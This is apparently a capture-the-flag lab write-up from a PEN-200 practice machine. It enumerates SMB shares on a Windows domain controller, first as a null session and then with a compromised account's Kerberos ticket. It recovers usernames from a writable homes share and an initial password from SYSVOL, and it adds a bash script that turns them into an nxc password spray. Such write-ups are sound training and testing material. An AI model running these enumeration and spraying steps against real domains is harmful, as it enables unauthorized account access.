SMB


Nmap discovered an SMB service on the target: the NetBIOS session service on 139/tcp and Microsoft-DS (SMB over TCP) on 445/tcp

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ nmap --script smb-enum-shares -sV -p139,445 $IP
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-25 13:55 CEST
Nmap scan report for dc.hokkaido-aerospace.com (192.168.119.40)
Host is up (1.5s latency).
 
PORT    STATE SERVICE       VERSION
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.00 seconds

The smb-enum-shares script produced no output, so unauthenticated share enumeration through Nmap failed

Null Session


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ nxc smb $IP -u '' -p '' --shares --interfaces
SMB         192.168.119.40  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
SMB         192.168.119.40  445    DC               [+] hokkaido-aerospace.com\:
SMB         192.168.119.40  445    DC               [-] Error enumerating shares: STATUS_ACCESS_DENIED

The target accepts a null session (empty username and password), but that session has no privilege to list shares; enumeration fails with STATUS_ACCESS_DENIED. The banner also shows that SMB signing is required and SMBv1 is disabled, which rules out relay and legacy-protocol tricks later

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ smbclient -L //$IP/
Password for [WORKGROUP\kali]:
Anonymous login successful
 
        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.119.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

smbclient confirms the same thing: an anonymous login succeeds, but the session lacks the privileges needed to list shares, and the SMB1 fallback for the workgroup listing fails because SMBv1 is disabled

info Session


The info account has been compromised.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=info@dc.hokkaido-aerospace.com.ccache FindDomainShare HOKKAIDO-AEROSPACE.COM/info@dc.hokkaido-aerospace.com -k -no-pass -dc-ip $IP -check-access -check-admin
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Starting domain share enumeration at 2025-04-25 15:19:14
[*] Connecting to LDAP at DC
[*] LDAPS connection successful
[*] Found 2 computers in the domain
[*] No accessible shares found on LANSWEEPER
[*] Found 9 shares on dc.hokkaido-aerospace.com
[*] Enumeration completed in 0:00:02.747970. Found 9 shares.
 
Found 9 shares:
----------------------------------------------------------------------------------------------------
Computer                  Share           Type             Admin  Read  Write OS                   Remark                    
----------------------------------------------------------------------------------------------------
dc.hokkaido-aerospace.com ADMIN$          Unknown (Hidden) No     No    No    Windows Server 2022  Remote Admin              
dc.hokkaido-aerospace.com C$              Unknown (Hidden) No     No    No    Windows Server 2022  Default share             
dc.hokkaido-aerospace.com homes           Unknown          No     Yes   Yes   Windows Server 2022  user homes                
dc.hokkaido-aerospace.com IPC$            Disk (Hidden)    No     Yes   No    Windows Server 2022  Remote IPC                
dc.hokkaido-aerospace.com NETLOGON        Unknown          No     Yes   No    Windows Server 2022  Logon server share        
dc.hokkaido-aerospace.com SYSVOL          Unknown          No     Yes   No    Windows Server 2022  Logon server share        
dc.hokkaido-aerospace.com UpdateServicesP Unknown          No     Yes   No    Windows Server 2022  A network share to be used
dc.hokkaido-aerospace.com WsusContent     Unknown          No     Yes   No    Windows Server 2022  A network share to be used
dc.hokkaido-aerospace.com WSUSTemp        Unknown          No     No    No    Windows Server 2022  A network share used by Lo

Checking the target SMB server with FindDomainShare as the info user reveals several non-default shares (the ADMIN$, C$, IPC$, NETLOGON and SYSVOL shares are standard on a domain controller):

  • homes
  • UpdateServicesPackages
  • WsusContent
  • WSUSTemp

The presence of UpdateServicesPackages, WsusContent, and WSUSTemp suggests that the target system has WSUS installed. Note that info has read access only to the WSUS shares and WSUSTemp is not accessible at all, so tampering with update content is not an option from this account; homes, on the other hand, is both readable and writable.
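Triage of a share table like the one above is easy to get wrong when done by eye across many hosts, so here is an added example (not part of the original write-up or of FindDomainShare) that cuts the fixed-width table at the header's column offsets, separates default from non-default shares and lists the writable ones. Whitespace splitting would break on columns that contain spaces ("Unknown (Hidden)", "Windows Server 2022"), hence the offset approach. The sample table is the one printed above, embedded so the script runs offline; FindDomainShare truncates long share names (UpdateServicesP), so names taken from the table should be confirmed with `use <share>` before being relied on.

```bash
#!/usr/bin/env bash
# Added example: triage a FindDomainShare table by header column offsets.
set -eu

# Constructed sample: the FindDomainShare table shown above, embedded so the
# parser can be exercised without a target.
share_table() {
cat <<'EOF'
Found 9 shares:
----------------------------------------------------------------------------------------------------
Computer                  Share           Type             Admin  Read  Write OS                   Remark
----------------------------------------------------------------------------------------------------
dc.hokkaido-aerospace.com ADMIN$          Unknown (Hidden) No     No    No    Windows Server 2022  Remote Admin
dc.hokkaido-aerospace.com C$              Unknown (Hidden) No     No    No    Windows Server 2022  Default share
dc.hokkaido-aerospace.com homes           Unknown          No     Yes   Yes   Windows Server 2022  user homes
dc.hokkaido-aerospace.com IPC$            Disk (Hidden)    No     Yes   No    Windows Server 2022  Remote IPC
dc.hokkaido-aerospace.com NETLOGON        Unknown          No     Yes   No    Windows Server 2022  Logon server share
dc.hokkaido-aerospace.com SYSVOL          Unknown          No     Yes   No    Windows Server 2022  Logon server share
dc.hokkaido-aerospace.com UpdateServicesP Unknown          No     Yes   No    Windows Server 2022  A network share to be used
dc.hokkaido-aerospace.com WsusContent     Unknown          No     Yes   No    Windows Server 2022  A network share to be used
dc.hokkaido-aerospace.com WSUSTemp        Unknown          No     No    No    Windows Server 2022  A network share used by Lo
EOF
}

# Print one tab-separated line per share: name, read, write, default|non-default.
# Columns are cut at the offsets where the header words start, because several
# columns contain spaces. Default shares are the administrative drive shares
# (C$, D$, ...), ADMIN$, IPC$, print$ and the domain controller shares
# NETLOGON and SYSVOL.
classify_shares() {
  awk '
    function trim(s) { gsub(/^[ \t]+|[ \t]+$/, "", s); return s }
    /^Computer +Share +Type/ {
      n = split("Computer Share Type Admin Read Write OS Remark", cols, " ")
      for (i = 1; i <= n; i++) pos[i] = index($0, cols[i])
      in_table = 1; next
    }
    !in_table || /^-+$/ || NF == 0 { next }
    {
      for (i = 1; i <= n; i++) {
        len = (i < n) ? pos[i + 1] - pos[i] : length($0)
        f[cols[i]] = trim(substr($0, pos[i], len))
      }
      kind = (f["Share"] ~ /^([A-Za-z]\$|ADMIN\$|IPC\$|print\$|NETLOGON|SYSVOL)$/) ? "default" : "non-default"
      printf "%s\t%s\t%s\t%s\n", f["Share"], f["Read"], f["Write"], kind
    }
  '
}

# Non-default shares: the ones worth browsing first for misplaced files.
nondefault_shares() { classify_shares | awk -F'\t' '$4 == "non-default" { print $1 }'; }

# Writable shares: the ones that matter for planting files, and a finding in
# their own right when every authenticated user can write to them.
writable_shares() { classify_shares | awk -F'\t' '$3 == "Yes" { print $1 }'; }

# Usage with live output: FindDomainShare ... | classify_shares
share_table | classify_shares
```

Piping real FindDomainShare output through `classify_shares` instead of `share_table` works unchanged, since the parser only relies on the header line to find the columns.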

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=info@dc.hokkaido-aerospace.com.ccache impacket-smbclient HOKKAIDO-AEROSPACE.COM/@dc.hokkaido-aerospace.com -k -no-pass -dc-ip $IP                            
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Type help for list of commands
# 

Session established

homes Share


# use homes
# ls
drw-rw-rw-          0  Fri Apr 25 15:18:57 2025 .
drw-rw-rw-          0  Fri Apr 25 15:06:29 2025 ..
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Angela.Davies
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Annette.Buckley
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Anthony.Anderson
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Catherine.Knight
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Charlene.Wallace
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Cheryl.Singh
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Deborah.Francis
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Declan.Woodward
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Elliott.Jones
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Gordon.Brown
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Grace.Lees
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Hannah.O'Neill
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Irene.Dean
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Julian.Davies
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Lynne.Tyler
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Molly.Edwards
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Rachel.Jones
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Sian.Gordon
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Tracy.Wood
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Victor.Kelly
 
# tree
Finished - 20 files and folders

The homes share indeed contains a home directory for each domain user. Interestingly, they are all empty, but the directory names themselves are a list of valid domain usernames, and the share is writable for info

SYSVOL Share


# use SYSVOL
# tree
/hokkaido-aerospace.com/DfsrPrivate
/hokkaido-aerospace.com/Policies
/hokkaido-aerospace.com/scripts
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}
/hokkaido-aerospace.com/scripts/temp
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/USER
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/USER
/hokkaido-aerospace.com/scripts/temp/password_reset.txt
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Scripts
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Scripts
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Scripts/Shutdown
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Scripts/Startup
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Scripts/Shutdown
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Scripts/Startup
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
Finished - 29 files and folders

There is an interesting file outside the standard Policies tree: /hokkaido-aerospace.com/scripts/temp/password_reset.txt

password_reset.txt File


# cat /hokkaido-aerospace.com/scripts/temp/password_reset.txt
Initial Password: Start123!

The password_reset.txt file contains what appears to be an initial (default) password handed out after a reset. Combined with the usernames recovered from the homes share, it can be leveraged for another password spraying attack.
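The two findings above (home-directory names in homes, an initial password in SYSVOL) combine into one spray. The following is an added example, not part of the original write-up: it extracts the directory names from the impacket-smbclient `ls` output of the homes share into a username list and sprays the recovered password with nxc. The listing is the one shown above, embedded so the parser runs offline; the nxc invocation only runs when a TARGET is given.

```bash
#!/usr/bin/env bash
# Added example: homes-share listing -> username list -> single-password spray.
set -eu

# Constructed sample: the impacket-smbclient `ls` output of the homes share
# shown above, embedded so the parser can be exercised without a target.
homes_listing() {
cat <<'EOF'
drw-rw-rw-          0  Fri Apr 25 15:18:57 2025 .
drw-rw-rw-          0  Fri Apr 25 15:06:29 2025 ..
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Angela.Davies
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Annette.Buckley
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Anthony.Anderson
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Catherine.Knight
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Charlene.Wallace
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Cheryl.Singh
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Deborah.Francis
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Declan.Woodward
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Elliott.Jones
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Gordon.Brown
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Grace.Lees
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Hannah.O'Neill
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Irene.Dean
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Julian.Davies
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Lynne.Tyler
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Molly.Edwards
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Rachel.Jones
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Sian.Gordon
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Tracy.Wood
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Victor.Kelly
EOF
}

# Extract directory names from impacket-smbclient `ls` output read on stdin.
# Fields 1-7 are mode, size and timestamp; the name is everything after them,
# so names with spaces or apostrophes (Hannah.O'Neill) survive intact.
# The "." and ".." entries are dropped.
users_from_listing() {
  awk '$1 ~ /^d/ && NF >= 8 {
    name = $8
    for (i = 9; i <= NF; i++) name = name " " $i
    if (name != "." && name != "..") print name
  }'
}

# Spray one password across the whole list. One attempt per account cannot
# reach a lockout threshold, but check the domain password policy before
# trying a second password. --continue-on-success keeps going after the first
# valid login so every account still using the initial password is reported.
spray_default_password() {
  target=$1; users_file=$2; password=$3
  nxc smb "$target" -u "$users_file" -p "$password" --continue-on-success
}

# Only touch the network when a target is given, e.g. TARGET=$IP ./spray.sh
if [ -n "${TARGET:-}" ]; then
  homes_listing | users_from_listing > users.txt
  spray_default_password "$TARGET" users.txt 'Start123!'
fi
```

With a live session the listing comes from `impacket-smbclient` instead of `homes_listing`; the parser does not care where the lines originate. When reading the spray results, a STATUS_PASSWORD_MUST_CHANGE response is still a confirmed credential: the initial password is correct and the account simply has to change it at first logon.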

UpdateServicesPackages Share


# use UpdateServicesPackages
# tree
Finished - 0 files and folders

The share is empty.

WsusContent Share


# use WsusContent
# tree
/anonymousCheckFile.txt
Finished - 0 files and folders

anonymousCheckFile.txt File


# cat anonymousCheckFile.txt
 

The anonymousCheckFile.txt file is empty. WSUS creates this zero-byte file in its content directory to verify that the IIS content virtual directory is reachable anonymously, so its presence further confirms that WSUS is installed; it holds nothing useful by itself.